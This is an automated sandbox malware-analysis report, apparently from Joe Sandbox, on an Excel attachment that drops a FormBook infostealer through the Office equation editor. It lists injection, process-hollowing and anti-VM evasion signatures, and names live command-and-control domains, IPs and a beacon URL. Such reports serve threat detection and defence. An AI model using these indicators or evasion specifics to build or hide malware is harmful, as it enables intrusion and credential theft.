          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: systray.pdbB source: vbc.exe, 00000005.00000002.2201164728.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: systray.pdb source: vbc.exe, 00000005.00000002.2201164728.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, systray.exe
          Source: RAPID SOA.xlsxInitial sample: OLE indicators vbamacros = False
          Source: RAPID SOA.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E8AF9 push eax; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E8B17 push ebx; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004178C0 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004164F1 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF6C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF02 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF0B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00416713 push esi; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DDFA1 push ecx; ret
          Source: C:\Windows\explorer.exeCode function: 6_2_0297D3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FCDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DD36B pushfd ; retf
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D64F1 push ss; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D6713 push esi; retf
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D78C0 pushfd ; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DDB9A push esi; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DCF0B push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DCF02 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DCF6C push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022BE3E6 pushad ; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.65337378217
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: RAPID SOA.xlsxStream path 'EncryptedPackage' entropy: 7.99990652787 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2668, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000000C9B5E second address: 00000000000C9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2492Thread sleep time: -180000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2684Thread sleep time: -50819s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2748Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2972Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 2440Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000006.00000000.2169918025.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2180909119.0000000004297000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.2180798507.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.2180694624.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000002.2379791159.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FD26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.154.206.199 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 8B0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000002.2379969047.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2379969047.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2169918025.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2379969047.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344819 Sample: RAPID SOA.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 39 www.jewishposter.com 2->39 41 jewishposter.com 2->41 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 15 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 49 chise2neversndywalka.dns.army 103.125.191.208, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 11->49 33 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 11->18         started        37 C:\Users\user\Desktop\~$RAPID SOA.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 51 Machine Learning detection for dropped file 18->51 53 Tries to detect virtualization through RDTSC time measurements 18->53 55 Injects a PE file into a foreign processes 18->55 21 vbc.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 43 diversitypatriots.com 184.154.206.199, 49169, 80 SINGLEHOP-LLCUS United States 24->43 45 thecreatorsbook.com 184.168.131.241, 49168, 80 AS-26496-GO-DADDY-COM-LLCUS United States 24->45 47 2 other IPs or domains 24->47 73 System process connects to network (likely due to code injection or exploit) 24->73 28 systray.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RAPID SOA.xlsx24%ReversingLabsDocument-Office.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.systray.exe.8b0000.0.unpack100%AviraTR/Dropper.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://www.thecreatorsbook.com/aky/?MrIpf=y480GprHQ4MP&flX0DJ5=mHx4rV5tLr28MmvSGkxB9LVhRseCNR332GkcowizwEXSFPKeI/LlmY6x2m1vfw1VmIUMbA==0%Avira URL Cloudsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thecreatorsbook.com
          184.168.131.241
          truetrue
            unknown
            jewishposter.com
            34.102.136.180
            truetrue
              unknown
              chise2neversndywalka.dns.army
              103.125.191.208
              truetrue
                unknown
                diversitypatriots.com
                184.154.206.199
                truetrue
                  unknown
                  www.thecreatorsbook.com
                  unknown
                  unknowntrue
                    unknown
                    www.diversitypatriots.com
                    unknown
                    unknowntrue
                      unknown
                      www.jewishposter.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.thecreatorsbook.com/aky/?MrIpf=y480GprHQ4MP&flX0DJ5=mHx4rV5tLr28MmvSGkxB9LVhRseCNR332GkcowizwEXSFPKeI/LlmY6x2m1vfw1VmIUMbA==true
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                          high
